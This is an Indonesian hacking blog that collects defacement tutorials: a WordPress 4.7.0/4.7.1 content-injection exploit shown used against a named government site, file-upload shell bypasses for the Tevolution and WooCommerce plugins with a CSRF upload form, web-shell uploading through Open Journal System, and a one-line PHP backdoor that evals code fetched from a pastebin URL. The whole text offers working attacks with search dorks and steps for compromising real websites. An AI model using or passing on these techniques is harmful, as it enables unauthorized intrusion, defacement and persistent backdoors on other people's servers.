WordPress 4.7.0 / 4.7.1 Content Injection

Hallo Pengunjung Setia :"V
Udah Lama Ainx Nggak Posting Di Blog Ini :')
Kalo Ini Saya Akan Memberikan Tutorial Yang Mungkin Bermanfaat :"V


Dalam Artikel Kali Ini Masih Tentang Website!
Khususnya WordPress, Nah Jika Kalian Menemukan WordPress Version 4.7 Atau 4.7.1
Mungkin Bisa Di Eksekusi Dengan Cara Ini, Tapi Lumayan Banyak Situs Pemerintah Terkana Exploit Ini. Tapi hanya bisa mengganti artikel yang sudah ada pada situs tersebut.

Diperlukan ;
Dork : USE YOUR BRAIN !
Exploit : /wp-json/wp/v2/posts/
Linux : Ruby (Source : Click here! )
* Kalau Yang Menggunakan Windows, Silahkan Lihat Disini.

1. Silahkan Cari Situs WordPress Versi 4.7 / 4.7.0 / 4.7.1 Terlebih dahulu.


2. Masukan Exploitnya Untuk Melihat Artikel Yang Ingin Diganti Postingan'nya


3. Jalankan File Ruby'nya 😈

Usage :
al1337@w0rm:~$ cd Desktop/Private/Ruby
al1337@w0rm:~/Desktop/Private/Ruby$ ruby wpV47.rb
Enter Target URL (With wp directory)
http://www.bighorncountymt.gov
Enter Post ID
746
Yeah, Berhasil! 'http://www.bighorncountymt.gov/index.php?p=746'

Jika Berhasil Nanti Akan Ada Link Letak Post Yang Terganti.
Jika Tidak, Silahkan Cari Target Lain :"V

Sekian :*

Read More

Deface Teknik WordPress Plugins Tevolution


Google Dork : Index of /wp-content/plugins/Tevolution/

Exploit : https://websites/wordpress
   /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

Bypass Shell : files.php.xxxjpg

Gagal Bypass ? Upload Biasa Aja : files.txt

~ Step By Step ~

1. Cari Website Target, Bisa Menggunakan Dork Diatas, Kalau Bisa Kembangin Lagi Dorknya ^_^

2. Masukan Exploitnya Diakhiran Website Atau Setelah Website,

Jika Vuln, Tampilannya Akan BLANK Warna Putih.

3. Setelah Berhasil Menemukan Yang Vuln, Silahkan Buat File CSRF.html

<form action="https://website/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>


Edit Tanda Merah (Url) Itu, Lalu Simpan Filenya Dengan Ext.HTML

4. Lalu Buka File CSRF Tersebut Dan Upload "files.php.xxxjpg" Atau "files.txt"
 Jika Berhasil, Muncul Kode Random (Nama File Random)



5. Dan Untuk Melihat Hasilnya Bisa Ditambahkan Url Seperti Ini.

https://WordPress/wp-content/themes/Directory/images/tmp/random-files.ext

Terima Kasih,

Read More

WordPress Plugins WooCommerce File Upluad

Google Dork.
 inurl:"/plugins/woocommerce-product-options/"
 Index of /wp-content/plugins/woocommerce-product-options/
Google Dork Use Your Brain :)

Exploit.
 localhost /wp-content/plugins/woocommerce-product-options/includes/image-upload.php

Tutorial.

1. Pilih Target Website Hasil Dorking Atau Sudah Dapat.

2. Masukan Exploit Setelah Website Target.
 example ,
https://localhost/path /wp-content/plugins/woocommerce-product-options/includes/image-upload.php
https://localhost /wp-content/plugins/woocommerce-product-options/includes/image-upload.php

3. Vulnerability Ada Tempat Uploader Images.
 Silahkan Upload Images Atau Bypass Shell.
Bypass Ext Shell : Shells.php;.jpg
Jika Tidak Bisa Di Ext Shell , Silahkan Upload .jpg .png .jpeg .gif Atau .txt



4. Jika Sudah TerUpload Dengan Sendirinya Setelah Kalian Memilih File.
 Dan Letak File Kalian Ada Disini.
https://localhost /wp-content/uploads/tahun(4)/bulan(2)/file-kamu.ext

Selesai , Terima Kasih Telah Berkunjung. :)

Read More

Deface Teknik Open Journal System

Image result for open journal system

Siapkan.
- Shell.phtml
- Email

Dork :
 /index.php/hukum/user/register , Use Your Brain.

Carilah Target Dengan Dork Di Pencarian Google.
Jika Sudah Punya Target , Mari Kita Simak Tutorialnya

1. Anda Harus Register Terlebih Dahulu.
 https://localhost/path /index.php/hukum/user/register
Isi Data-Data Yang Diperlukan Saja , Yaitu Yang Ada Tanda Bintang (*) Saja.


Untuk Kolom Centang , Terserah Kalian Saja , Kalau Saya Seperti Di Screenshot :)
Jika Sudah , Klik "Register".
Jika Kamu Centang (Ceklis) Yang "Confirmation" Nanti Kamu Akan Disuruh Vertifikasi Melalui Email.

2. Setelah Register , Lalu Kamu Akan Berada Di Tempat Ini (Screenshot)
 https://localhost/path /index.php/hukum/user


Lalu Klik "[New Submission]"

3. Dan Nanti Kamu Akan Berada Di Step Awal Untuk Submit Shell.phtml (Kalau Bisa) :3
 Pada Bagian "Submission Checklist" Centang (Ceklis) Semua Saja.
 Pada Bagian "Comments for the Editor" Isi Apa Saja , Terserah.


Lalu Klik "Save And Continue"

4. Dan Pada Bagian Tahap Ini Silahkan Kamu Upload Shell.phtml :)
Lalu Klik "Upload"
Nanti Akan Tanda Sukses Seperti Di Gambar Ini.


Keterangan :
 File Name : 867-1735-2-SM.phtml
 ID-User : 867   ,   Angka Awal
 Angka 1 : Jika Tidak Muncul Shell , Ganti Angka Tersebut Dengan Angka Selanjutnya.

Dan Lihat Hasilnya
https://localhost /files/journals/1/articles/ID-User/submission/original/File Name.phtml

Terima Kasih.

Read More

Memperkecil Ukuran Shell Backdoor


Bahan-Bahan :
- Shell Backdoor PHP Yang BerUkuran Besar   [ Script Terlalu Banyak ]

1. Buatlah Script Seperti Ini.

   <?php eval("?>".file_get_contents("anunya"));?>

2. Simpan Script PHP Atau Shell Backdoor Kamu Di Pastebin.


3. Nah Saya Sudah Menaruhnya Disitu.
   http://www.pastebin.com/SMNaSDLp
Lalu Tambahkan /raw/ Sebelum SMNaSDLp

Jadi   :   http://www.pastebin.com/raw/SMNaSDLp

4. Lalu Di Script Yang Awal
   <?php eval("?>".file_get_contents("anunya"));?>

"anunya" <= anunya , Kita Ganti Dengan Dengan Url Pastebin Kita Yang Dengan /raw/ Itu.

Jadi   :

<?php eval("?>".file_get_contents("http://www.pastebin.com/raw/SMNaSDLp"));?>

Lalu Simpan Deh Di Website Target.php   ;)
Ukurannya Kurang Dari 1kb kan???   :v wkwkwk
Selamat Mencoba   :*

Read More